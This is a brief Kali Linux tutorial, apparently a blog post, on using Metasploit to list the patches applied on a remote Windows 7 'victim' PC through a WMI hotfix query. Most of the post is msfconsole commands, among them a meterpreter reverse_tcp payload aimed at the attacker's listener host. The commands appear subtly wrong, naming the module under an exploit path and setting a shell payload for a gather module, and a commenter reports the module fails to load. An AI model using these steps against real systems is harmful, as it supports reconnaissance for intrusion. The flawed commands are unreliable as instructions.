Kali Linux, Penetration Testing

How to Gather Applied Patches in Remote Windows PC

This module will attempt to enumerate which patches are applied to a windows system based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering

Exploit Targets

Windows 7


Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/gather/enum_patches

msf exploit (enum_patches)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_patches)>set lhost (IP of Local Host)

msf exploit (enum_patches)>set session 1

msf exploit (enum_patches)>exploit


3 thoughts on “How to Gather Applied Patches in Remote Windows PC

  1. Always get a “Failed to load module” error, I even tried it on windows version of metaslpoit, and got same issue.

Comments are closed.